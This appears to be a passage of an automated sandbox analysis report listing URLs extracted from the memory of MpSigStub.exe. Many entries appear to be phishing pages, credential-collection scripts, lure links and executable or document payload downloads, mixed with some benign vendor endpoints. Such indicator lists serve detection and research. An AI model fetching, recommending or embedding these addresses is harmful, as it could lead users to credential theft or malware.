Source: MpSigStub.exe, 00000023.00000003.6317668915.0000028BD6D56000.00000004.00000001.sdmp	String found in binary or memory: https://seyedishop.ir/rh1/pmt.php
Source: MpSigStub.exe, 00000023.00000003.6305136059.0000028BD6F84000.00000004.00000001.sdmp	String found in binary or memory: https://shaastraarth.in/bbbg/
Source: MpSigStub.exe, 00000023.00000003.6315879958.0000028BD6D14000.00000004.00000001.sdmp	String found in binary or memory: https://shatha.n-idea.us/moo/
Source: MpSigStub.exe, 00000023.00000003.6283306166.0000028BD6B04000.00000004.00000001.sdmp	String found in binary or memory: https://shop.asopalav.com/ds/0302.gif
Source: MpSigStub.exe, 00000023.00000003.6339082124.0000028BD7EB5000.00000004.00000001.sdmp	String found in binary or memory: https://shoplady.xyz/glsdil.php
Source: MpSigStub.exe, 00000023.00000003.6315879958.0000028BD6D14000.00000004.00000001.sdmp	String found in binary or memory: https://shoptimes.ro/admin/clienti/opo.php
Source: MpSigStub.exe, 00000023.00000003.6435757961.0000028BD7C8D000.00000004.00000001.sdmp	String found in binary or memory: https://shouldntthrowstones.co.uk/vv/exl-idnero.php?loginhtw952
Source: MpSigStub.exe, 00000023.00000003.6267925507.0000028BD6E61000.00000004.00000001.sdmp	String found in binary or memory: https://shreyainfosoft.com/krishnasteelcorporation/next.php
Source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp	String found in binary or memory: https://shreyainfosoft.com/shayonajwellers/after.php
Source: MpSigStub.exe, 00000023.00000003.6283884268.0000028BD64D2000.00000004.00000001.sdmp	String found in binary or memory: https://signin.ebay
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: https://simetrika.com/redirect/zg9uywxklmvhdmvzqgfjy2vsbgvudc5jb20=
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	String found in binary or memory: https://sinavtakvim.icu/zx/ag.doc
Source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmp	String found in binary or memory: https://sis.ieadar.com.br-$r)r/Igreja-master/agendaSec/css/Sq4D0WfbvSitsO.php
Source: MpSigStub.exe, 00000023.00000003.6346459854.0000028BD6536000.00000004.00000001.sdmp	String found in binary or memory: https://skripon.com/oozoo/document.php
Source: MpSigStub.exe, 00000023.00000003.6305976502.0000028BD7388000.00000004.00000001.sdmp	String found in binary or memory: https://smartcheckautos%.com/wp%-content/%.%.%./%.%.%./x3%.php
Source: MpSigStub.exe, 00000023.00000003.6346459854.0000028BD6536000.00000004.00000001.sdmp	String found in binary or memory: https://smpn1kunjangkediri.sch.id/wp-content/uploads/upgrabe/
Source: MpSigStub.exe, 00000023.00000003.6439110180.0000028BD7F7A000.00000004.00000001.sdmp	String found in binary or memory: https://snowfall.top/eusetup.exe
Source: MpSigStub.exe, 00000023.00000003.6346459854.0000028BD6536000.00000004.00000001.sdmp	String found in binary or memory: https://soft-gps.com/wp-content/plugins/cvuohucwkp/tre/swt.php
Source: MpSigStub.exe, 00000023.00000003.6291965399.0000028BD7440000.00000004.00000001.sdmp	String found in binary or memory: https://sotheraho.com/wp-content/fonts/reportexcelnew.php
Source: MpSigStub.exe, 00000023.00000003.6300664525.0000028BD7A3C000.00000004.00000001.sdmp	String found in binary or memory: https://southpolefaxnet.ml/number/brand.php
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	String found in binary or memory: https://southvomes.sozouths.xyz/?e=
Source: MpSigStub.exe, 00000023.00000003.6295487239.0000028BD661C000.00000004.00000001.sdmp	String found in binary or memory: https://specs2go.shawalzahid.com/
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	String found in binary or memory: https://ssl-proxy.my-addr.org/myaddrproxy.php/http://
Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp	String found in binary or memory: https://ssl859.websiteseguro.com/downloadflash/dados/Juliana.jpg
Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp	String found in binary or memory: https://ssl859.websiteseguro.com/downloadflash/dados/grdmody.jpg
Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp	String found in binary or memory: https://ssl859.websiteseguro.com/downloadflash/dados/msnGRD.jpg
Source: MpSigStub.exe, 00000023.00000003.6317125613.0000028BD6C91000.00000004.00000001.sdmp	String found in binary or memory: https://ssmdevelopers.in/4raxigaptfpm/yu.html
Source: MpSigStub.exe, 00000023.00000003.6283686217.0000028BD64B3000.00000004.00000001.sdmp	String found in binary or memory: https://staging2.lifebiotic.com/novacms/grassandrocks.php
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	String found in binary or memory: https://staralevator.com/anygas/
Source: MpSigStub.exe, 00000023.00000003.6346459854.0000028BD6536000.00000004.00000001.sdmp	String found in binary or memory: https://staralevator.com/anygas/nxt.php
Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp	String found in binary or memory: https://static.wixstatic.com/ugd/05e470_b104c366c1f7423293887062c7354db2.doc
Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp	String found in binary or memory: https://static.wixstatic.com/ugd/859f79_35181f339d694f87870220aa3da46c30.doc
Source: MpSigStub.exe, 00000023.00000003.6283306166.0000028BD6B04000.00000004.00000001.sdmp	String found in binary or memory: https://statsdev.com/header.jpg
Source: MpSigStub.exe, 00000023.00000003.6283306166.0000028BD6B04000.00000004.00000001.sdmp	String found in binary or memory: https://statseast.com/login.jpg
Source: MpSigStub.exe, 00000023.00000003.6267925507.0000028BD6E61000.00000004.00000001.sdmp	String found in binary or memory: https://statsmag.com/apple/log.php
Source: MpSigStub.exe, 00000023.00000003.6339973088.0000028BD6769000.00000004.00000001.sdmp	String found in binary or memory: https://statsper.com/footer.jpg
Source: MpSigStub.exe, 00000023.00000003.6283306166.0000028BD6B04000.00000004.00000001.sdmp	String found in binary or memory: https://statssale.com/header.jpg
Source: MpSigStub.exe, 00000023.00000003.6267925507.0000028BD6E61000.00000004.00000001.sdmp	String found in binary or memory: https://stepup.pt/sugar6/ww/s.dot
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: https://stitch-statichosting-prod.s3.amazonaws.com/5ffbf74f106b1ff88367ac90/5ffbf62cd17b985f24b01f73
Source: MpSigStub.exe, 00000023.00000003.6290146708.0000028BD5FA2000.00000004.00000001.sdmp	String found in binary or memory: https://storage.googleapis.com/
Source: MpSigStub.exe, 00000023.00000003.6287012861.0000028BD6A98000.00000004.00000001.sdmp	String found in binary or memory: https://storage.googleapis.com/msofficeupdater/MSUpdater.exe
Source: MpSigStub.exe, 00000023.00000003.6439110180.0000028BD7F7A000.00000004.00000001.sdmp	String found in binary or memory: https://storage.googleapis.com/officexel/remittance%20invoice.zip
Source: MpSigStub.exe, 00000023.00000003.6439110180.0000028BD7F7A000.00000004.00000001.sdmp	String found in binary or memory: https://storagepinetown.co.za/1/14/?email=itsupport
Source: MpSigStub.exe, 00000023.00000003.6291965399.0000028BD7440000.00000004.00000001.sdmp	String found in binary or memory: https://storyofusstudios.com/n75oh9tzoyhz/lipa.html
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	String found in binary or memory: https://stretchbuilder.com/chalkzone/next.php
Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: https://stretchwrestle.com/ringcentral/wealth.php
Source: MpSigStub.exe, 00000023.00000003.6338116203.0000028BD7305000.00000004.00000001.sdmp	String found in binary or memory: https://studio.joellemagazine.com/drms/ind.html
Source: MpSigStub.exe, 00000023.00000003.6265938697.0000028BD6B47000.00000004.00000001.sdmp	String found in binary or memory: https://subahj.linkpc.net/sarah2/next.php
Source: MpSigStub.exe, 00000023.00000003.6307279106.0000028BD6061000.00000004.00000001.sdmp	String found in binary or memory: https://submit-form.com/
Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp	String found in binary or memory: https://subwaybookreview.com/vl1/sample.doc
Source: MpSigStub.exe, 00000023.00000003.6286232837.0000028BD6261000.00000004.00000001.sdmp	String found in binary or memory: https://suggestor.pirrit.com/engine/getpopups.php
Source: MpSigStub.exe, 00000023.00000003.6299498937.0000028BD6FED000.00000004.00000001.sdmp	String found in binary or memory: https://sumnermail.org/sumnerscools/school.php
Source: MpSigStub.exe, 00000023.00000003.6315036458.0000028BD60E4000.00000004.00000001.sdmp	String found in binary or memory: https://sundersls.weebly.com
Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: https://supplementsizeup.co.uk/aa/ger/login.php
Source: RegAsm.exe, 0000000A.00000002.7245398018.000000001E24E000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmp	String found in binary or memory: https://surustore.com/imageY9a
Source: MpSigStub.exe, 00000023.00000003.6266507875.0000028BD63ED000.00000004.00000001.sdmp	String found in binary or memory: https://sviescfze.com/iaret52086yla/next.php
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	String found in binary or memory: https://sviescfze.com/ns735tey89dgwmo/next.php
Source: MpSigStub.exe, 00000023.00000003.6422489024.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: https://sweetsizing.com/vip/
Source: MpSigStub.exe, 00000023.00000003.6436106917.0000028BD69FC000.00000004.00000001.sdmp	String found in binary or memory: https://syr.us/gpn
Source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmp	String found in binary or memory: https://t.co/ou2k0nuvi8)
Source: MpSigStub.exe, 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp	String found in binary or memory: https://t.me/File
Source: MpSigStub.exe, 00000023.00000003.6293840071.0000028BD7E72000.00000004.00000001.sdmp	String found in binary or memory: https://t.me/IamLev1
Source: MpSigStub.exe, 00000023.00000003.6293840071.0000028BD7E72000.00000004.00000001.sdmp	String found in binary or memory: https://t.me/IamLev1x
Source: MpSigStub.exe, 00000023.00000003.6346459854.0000028BD6536000.00000004.00000001.sdmp	String found in binary or memory: https://tales.pt/webmail-purchase/reportexcel.php
Source: MpSigStub.exe, 00000023.00000003.6318934861.0000028BD62E5000.00000004.00000001.sdmp	String found in binary or memory: https://tapro-trgovina.com/slimneweurope/next.php
Source: MpSigStub.exe, 00000023.00000003.6267325282.0000028BD7515000.00000004.00000001.sdmp	String found in binary or memory: https://tapro-trgovina.com/yalladg/
Source: MpSigStub.exe, 00000023.00000003.6439110180.0000028BD7F7A000.00000004.00000001.sdmp	String found in binary or memory: https://tdgnaples.com/.howe
Source: MpSigStub.exe, 00000023.00000003.6317551345.0000028BD6CD2000.00000004.00000001.sdmp	String found in binary or memory: https://techportal.cerner.com/api/validateProjectNumber?projectNumber=
Source: MpSigStub.exe, 00000023.00000003.6291965399.0000028BD7440000.00000004.00000001.sdmp	String found in binary or memory: https://tecnicopconline.com/wp-admin/jekbvhub.php
Source: MpSigStub.exe, 00000023.00000003.6346082988.0000028BD6579000.00000004.00000001.sdmp	String found in binary or memory: https://tegavu.com
Source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmp	String found in binary or memory: https://telegra.ph/
Source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmp	String found in binary or memory: https://ternerdrivew.at/3/wwf.dll
Source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmp	String found in binary or memory: https://ternerdrivew.at/3/wwf.exe
Source: MpSigStub.exe, 00000023.00000003.6267925507.0000028BD6E61000.00000004.00000001.sdmp	String found in binary or memory: https://testweb.public360saas.se:443/biz/v2-pbr/docprod/templates/bot_tjansteskrivelse.docx
Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmp	String found in binary or memory: https://thecloud-jewels.com/wp-content/themes/storefront/inc/admin/ms
Source: MpSigStub.exe, 00000023.00000003.6346459854.0000028BD6536000.00000004.00000001.sdmp	String found in binary or memory: https://thersshy.dynssl.com//
Source: MpSigStub.exe, 00000023.00000003.6346459854.0000028BD6536000.00000004.00000001.sdmp	String found in binary or memory: https://thersshy.dynssl.com//post.php
Source: MpSigStub.exe, 00000023.00000003.6315879958.0000028BD6D14000.00000004.00000001.sdmp	String found in binary or memory: https://thewatch-tv.com/guyofficeaprof/post.php
Source: MpSigStub.exe, 00000023.00000003.6284624022.0000028BD68F5000.00000004.00000001.sdmp	String found in binary or memory: https://thiscannotpossiblywork.local/
Source: MpSigStub.exe, 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmp	String found in binary or memory: https://tiagogalindo.com.br/1/ksu/index.html
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: https://ticket.webstudiotechnology.com/sc/wp-includes/SimplePie/XML/Declaration/ytUsz4l0Qo.php
Source: MpSigStub.exe, 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmp	String found in binary or memory: https://timbeck.net/redirect/ywxpbmeuc2vyymfulwjhcmj1qgrpbnvszwdhbc5ybw==
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: https://tinyurl.com/
Source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp	String found in binary or memory: https://tinyurl.com/bptvnhw6
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: https://tinyurl.com/j7tx7h8)
Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp	String found in binary or memory: https://tinyurl.com/up77pck
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: https://tinyurl.com/y7rku84vscrobj.dll
Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp	String found in binary or memory: https://tinyurl.com/yaozbad7
Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: https://tinyurl.com/yarknmzj
Source: MpSigStub.exe, 00000023.00000003.6438436558.0000028BD7597000.00000004.00000001.sdmp	String found in binary or memory: https://tiw0dspxozds.azurewebsites.net/fdoi
Source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmp	String found in binary or memory: https://todayutos.info
Source: MpSigStub.exe, 00000023.00000003.6291965399.0000028BD7440000.00000004.00000001.sdmp	String found in binary or memory: https://tomamate.si/
Source: MpSigStub.exe, 00000023.00000003.6283686217.0000028BD64B3000.00000004.00000001.sdmp	String found in binary or memory: https://toulousa.com/omg/rockspa.php
Source: MpSigStub.exe, 00000023.00000003.6295487239.0000028BD661C000.00000004.00000001.sdmp	String found in binary or memory: https://towingnow.ca/LvR2HWHdQ.php
Source: MpSigStub.exe, 00000023.00000003.6338449567.0000028BD8082000.00000004.00000001.sdmp	String found in binary or memory: https://tph786.com/gym/assets/css/
Source: MpSigStub.exe, 00000023.00000003.6317668915.0000028BD6D56000.00000004.00000001.sdmp	String found in binary or memory: https://tr.im/1azmq)
Source: MpSigStub.exe, 00000023.00000003.6322660545.0000028BD67AB000.00000004.00000001.sdmp	String found in binary or memory: https://track.fourtiz.com
Source: MpSigStub.exe, 00000023.00000003.6300664525.0000028BD7A3C000.00000004.00000001.sdmp	String found in binary or memory: https://tradingdashboards.com/
Source: MpSigStub.exe, 00000023.00000003.6334830370.0000028BD7708000.00000004.00000001.sdmp	String found in binary or memory: https://trafffi.ru/123?utm_term=
Source: MpSigStub.exe, 00000023.00000003.6334830370.0000028BD7708000.00000004.00000001.sdmp	String found in binary or memory: https://trafffi.ru/aws?utm_term=
Source: MpSigStub.exe, 00000023.00000003.6271903950.0000028BD6A3F000.00000004.00000001.sdmp	String found in binary or memory: https://trafffi.ru/shook?utm_term=
Source: MpSigStub.exe, 00000023.00000003.6271903950.0000028BD6A3F000.00000004.00000001.sdmp	String found in binary or memory: https://trafffi.ru/strik?utm_term=
Source: MpSigStub.exe, 00000023.00000003.6271903950.0000028BD6A3F000.00000004.00000001.sdmp	String found in binary or memory: https://traffking.ru/123?utm_term=
Source: MpSigStub.exe, 00000023.00000003.6271903950.0000028BD6A3F000.00000004.00000001.sdmp	String found in binary or memory: https://traffking.ru/aws?utm_term=
Source: MpSigStub.exe, 00000023.00000003.6307889726.0000028BD7137000.00000004.00000001.sdmp	String found in binary or memory: https://traffking.ru/shook?utm_term=
Source: MpSigStub.exe, 00000023.00000003.6307889726.0000028BD7137000.00000004.00000001.sdmp	String found in binary or memory: https://traffking.ru/strik?utm_term=
Source: MpSigStub.exe, 00000023.00000003.6326794298.0000028BD64F4000.00000004.00000001.sdmp	String found in binary or memory: https://transfer.sh/
Source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmp	String found in binary or memory: https://transfer.sh/yyaum/svchost.sh
Source: MpSigStub.exe, 00000023.00000003.6271903950.0000028BD6A3F000.00000004.00000001.sdmp	String found in binary or memory: https://trex-miner.com
Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmp	String found in binary or memory: https://trinitas.or.id/templates/jakarta/images/addons/msg.jpg
Source: MpSigStub.exe, 00000023.00000003.6267925507.0000028BD6E61000.00000004.00000001.sdmp	String found in binary or memory: https://ttraff.cc/
Source: MpSigStub.exe, 00000023.00000003.6267925507.0000028BD6E61000.00000004.00000001.sdmp	String found in binary or memory: https://ttraff.club/
Source: MpSigStub.exe, 00000023.00000003.6267925507.0000028BD6E61000.00000004.00000001.sdmp	String found in binary or memory: https://ttraff.com/
Source: MpSigStub.exe, 00000023.00000003.6267925507.0000028BD6E61000.00000004.00000001.sdmp	String found in binary or memory: https://ttraff.link/
Source: MpSigStub.exe, 00000023.00000003.6267925507.0000028BD6E61000.00000004.00000001.sdmp	String found in binary or memory: https://ttraff.me/
Source: MpSigStub.exe, 00000023.00000003.6267925507.0000028BD6E61000.00000004.00000001.sdmp	String found in binary or memory: https://ttraff.ru/
Source: MpSigStub.exe, 00000023.00000003.6430356442.0000028BD7C4C000.00000004.00000001.sdmp	String found in binary or memory: https://tubestore.com.br/wp-content/p_bn/
Source: MpSigStub.exe, 00000023.00000003.6334830370.0000028BD7708000.00000004.00000001.sdmp	String found in binary or memory: https://tweetperks.com/lbim8w/
Source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/eduClient
Source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmp	String found in binary or memory: https://u.lewd.se/
Source: MpSigStub.exe, 00000023.00000003.6299498937.0000028BD6FED000.00000004.00000001.sdmp	String found in binary or memory: https://u.nu/920yx
Source: MpSigStub.exe, 00000023.00000003.6299498937.0000028BD6FED000.00000004.00000001.sdmp	String found in binary or memory: https://u.nu/e6b2i
Source: MpSigStub.exe, 00000023.00000003.6436106917.0000028BD69FC000.00000004.00000001.sdmp	String found in binary or memory: https://u.nu/edc63
Source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmp	String found in binary or memory: https://u6882561.ct.sendgrid.net/wf/click?upn=o3yy7nxymwp5cpvqnxo3xb8sbgrdkj8vj
Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp	String found in binary or memory: https://u6947877.ct.sendgrid.net/wf/click?upn=aum5tbbw0s-2boddc9wvl76ffmwkftnihk7jwmiyskchpxyq1lorjb
Source: MpSigStub.exe, 00000023.00000003.6439110180.0000028BD7F7A000.00000004.00000001.sdmp	String found in binary or memory: https://uae-signs.com/wp-includes/SimplePie/Content/project1/PROJRCT-B.exe
Source: MpSigStub.exe, 00000023.00000003.6436106917.0000028BD69FC000.00000004.00000001.sdmp	String found in binary or memory: https://uaeub.com/ds/161120.gif
Source: MpSigStub.exe, 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmp	String found in binary or memory: https://ufile.io/xjsrzal2
Source: MpSigStub.exe, 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp	String found in binary or memory: https://uis.public360online.com:443/biz/v2-pbr/docprod/templates/_uis%20moteinnkalling_referat.docx
Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmp	String found in binary or memory: https://uniquestyle.dk/wp-content/themes/ifeaturepro5-child/gr.mpwq
Source: MpSigStub.exe, 00000023.00000003.6274258225.0000028BD7599000.00000004.00000001.sdmp	String found in binary or memory: https://unitedstates1.cp.wd.microsoft.us/WdCpSrvc.asmx
Source: MpSigStub.exe, 00000023.00000003.6274258225.0000028BD7599000.00000004.00000001.sdmp	String found in binary or memory: https://unitedstates1.cp.wd.microsoft.us/wdcp.svc/bond/submitReport
Source: MpSigStub.exe, 00000023.00000003.6274258225.0000028BD7599000.00000004.00000001.sdmp	String found in binary or memory: https://unitedstates1.cp.wd.microsoft.us/wdcp.svc/submitReport
Source: MpSigStub.exe, 00000023.00000003.6274258225.0000028BD7599000.00000004.00000001.sdmp	String found in binary or memory: https://unitedstates2.cp.wd.microsoft.us/WdCpSrvc.asmx
Source: MpSigStub.exe, 00000023.00000003.6274258225.0000028BD7599000.00000004.00000001.sdmp	String found in binary or memory: https://unitedstates2.cp.wd.microsoft.us/wdcp.svc/bond/submitReport
Source: MpSigStub.exe, 00000023.00000003.6274258225.0000028BD7599000.00000004.00000001.sdmp	String found in binary or memory: https://unitedstates2.cp.wd.microsoft.us/wdcp.svc/submitReport
Source: MpSigStub.exe, 00000023.00000003.6274258225.0000028BD7599000.00000004.00000001.sdmp	String found in binary or memory: https://unitedstates4.cp.wd.microsoft.us/WdCpSrvc.asmx
Source: MpSigStub.exe, 00000023.00000003.6274258225.0000028BD7599000.00000004.00000001.sdmp	String found in binary or memory: https://unitedstates4.cp.wd.microsoft.us/wdcp.svc/bond/submitReport
Source: MpSigStub.exe, 00000023.00000003.6274258225.0000028BD7599000.00000004.00000001.sdmp	String found in binary or memory: https://unitedstates4.cp.wd.microsoft.us/wdcp.svc/submitReport
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	String found in binary or memory: https://updatesdomainn.ml/
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	String found in binary or memory: https://updatesdomainn.ml/post.php
Source: MpSigStub.exe, 00000023.00000003.6307889726.0000028BD7137000.00000004.00000001.sdmp	String found in binary or memory: https://upload.cat/
Source: MpSigStub.exe, 00000023.00000003.6311413449.0000028BD79B9000.00000004.00000001.sdmp	String found in binary or memory: https://upload.wikimedia.org/wikipedia/commons/
Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp	String found in binary or memory: https://uploadvirus.com/uploads/
Source: MpSigStub.exe, 00000023.00000003.6307889726.0000028BD7137000.00000004.00000001.sdmp	String found in binary or memory: https://upt.fastsearch.me/
Source: MpSigStub.exe, 00000023.00000003.6345763717.0000028BD65BB000.00000004.00000001.sdmp	String found in binary or memory: https://upurl.me/m7oiv
Source: MpSigStub.exe, 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp	String found in binary or memory: https://upurl.me/vvkzd
Source: MpSigStub.exe, 00000023.00000003.6291965399.0000028BD7440000.00000004.00000001.sdmp	String found in binary or memory: https://urbanhomefitness.com/file/excelzz/index.php?email=
Source: MpSigStub.exe, 00000023.00000003.6438436558.0000028BD7597000.00000004.00000001.sdmp	String found in binary or memory: https://uringvermi.at/3/zet.dll
Source: MpSigStub.exe, 00000023.00000003.6315606620.0000028BD6CD3000.00000004.00000001.sdmp	String found in binary or memory: https://utilities.pcpitstop.com
Source: MpSigStub.exe, 00000023.00000003.6309579817.0000028BD8040000.00000004.00000001.sdmp	String found in binary or memory: https://vamoss.com.br/blogfolio/wp-content/upgrabe/
Source: MpSigStub.exe, 00000023.00000003.6346459854.0000028BD6536000.00000004.00000001.sdmp	String found in binary or memory: https://vaqww.dyndns.dk/tolly5/
Source: MpSigStub.exe, 00000023.00000003.6341363005.0000028BD7DAE000.00000004.00000001.sdmp	String found in binary or memory: https://vaqww.dyndns.dk/tolly5/next.php
Source: MpSigStub.exe, 00000023.00000003.6309579817.0000028BD8040000.00000004.00000001.sdmp	String found in binary or memory: https://vespang.cf/aggreey/post.php
Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp	String found in binary or memory: https://victoriaparkmazda-my.sharepoint.com/personal/ann_victoriaparkmazda_co_uk/_layouts/15/guestac
Source: MpSigStub.exe, 00000023.00000003.6312196496.0000028BD70F5000.00000004.00000001.sdmp	String found in binary or memory: https://vieeewen.org/ddy/next.php
Source: MpSigStub.exe, 00000023.00000003.6312196496.0000028BD70F5000.00000004.00000001.sdmp	String found in binary or memory: https://vieeewen.org/tgg/next.php
Source: MpSigStub.exe, 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmp	String found in binary or memory: https://viro.mleydier.fr/noauth
Source: MpSigStub.exe, 00000023.00000003.6267925507.0000028BD6E61000.00000004.00000001.sdmp	String found in binary or memory: https://vm.jt-voicem.club/?e=ckoonce
Source: MpSigStub.exe, 00000023.00000003.6267925507.0000028BD6E61000.00000004.00000001.sdmp	String found in binary or memory: https://vm.jt-voicem.club/?e=ljeffcoat
Source: MpSigStub.exe, 00000023.00000003.6422489024.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: https://vmnames.ssvoipsx.xyz/?e=%25
Source: MpSigStub.exe, 00000023.00000003.6338116203.0000028BD7305000.00000004.00000001.sdmp	String found in binary or memory: https://vmnapi.net/vmap/1.0/yhs/ms/yhs/?vmimp=
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: https://vn.pr-nijim.xyz/?e=soumu
Source: MpSigStub.exe, 00000023.00000003.6267925507.0000028BD6E61000.00000004.00000001.sdmp	String found in binary or memory: https://voice.vm-business.online/?e=jscott
Source: MpSigStub.exe, 00000023.00000003.6280430921.0000028BD7B02000.00000004.00000001.sdmp	String found in binary or memory: https://voicemailss.hozoimn.xyz/?e=twfyawx5bi5kywvja2vslw1peebnyxjhdghvbkvszwn0cmljlmnvbq==
Source: MpSigStub.exe, 00000023.00000003.6282961298.0000028BD6AC6000.00000004.00000001.sdmp	String found in binary or memory: https://voipses.eononass.xyz/?e=%25
Source: MpSigStub.exe, 00000023.00000003.6282961298.0000028BD6AC6000.00000004.00000001.sdmp	String found in binary or memory: https://voipss.snonames.xyz/?e=%25
Source: MpSigStub.exe, 00000023.00000003.6343684141.0000028BD6D99000.00000004.00000001.sdmp	String found in binary or memory: https://vooydvclhlqukhdvrsxe.com/tx.dll
Source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmp	String found in binary or memory: https://voyya.com.mx/wp-content/themes/Divi/incl(
Source: MpSigStub.exe, 00000023.00000003.6267925507.0000028BD6E61000.00000004.00000001.sdmp	String found in binary or memory: https://vp.videomeet.club/?e=
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	String found in binary or memory: https://vr2oq.csb.app/
Source: MpSigStub.exe, 00000023.00000003.6317125613.0000028BD6C91000.00000004.00000001.sdmp	String found in binary or memory: https://vsit.site/
Source: MpSigStub.exe, 00000023.00000003.6327210965.0000028BD7C8F000.00000004.00000001.sdmp	String found in binary or memory: https://vsit.site/4a8gk
Source: MpSigStub.exe, 00000023.00000003.6327210965.0000028BD7C8F000.00000004.00000001.sdmp	String found in binary or memory: https://vsit.site/ghqec
Source: MpSigStub.exe, 00000023.00000003.6327210965.0000028BD7C8F000.00000004.00000001.sdmp	String found in binary or memory: https://vsit.site/xndcx
Source: MpSigStub.exe, 00000023.00000003.6304347628.0000028BD6F26000.00000004.00000001.sdmp	String found in binary or memory: https://vtsamples.commondatastorage.googleapis.com/
Source: MpSigStub.exe, 00000023.00000003.6339082124.0000028BD7EB5000.00000004.00000001.sdmp	String found in binary or memory: https://wac.edgecastcdn.net/800952/5b595c13-aea5-4a6c-a099-d29c4678f6f2-api/gcbs
Source: MpSigStub.exe, 00000023.00000003.6339082124.0000028BD7EB5000.00000004.00000001.sdmp	String found in binary or memory: https://wac.edgecastcdn.net/800952/5b595c13-aea5-4a6c-a099-d29c4678f6f2-api/gccs
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: https://wacochamber.com/
Source: MpSigStub.exe, 00000023.00000003.6439110180.0000028BD7F7A000.00000004.00000001.sdmp	String found in binary or memory: https://wayphositu.info/nasm3m/chalo.php?id=154789
Source: MpSigStub.exe, 00000023.00000003.6339973088.0000028BD6769000.00000004.00000001.sdmp	String found in binary or memory: https://we.tl/t-ccUfUrQOhF
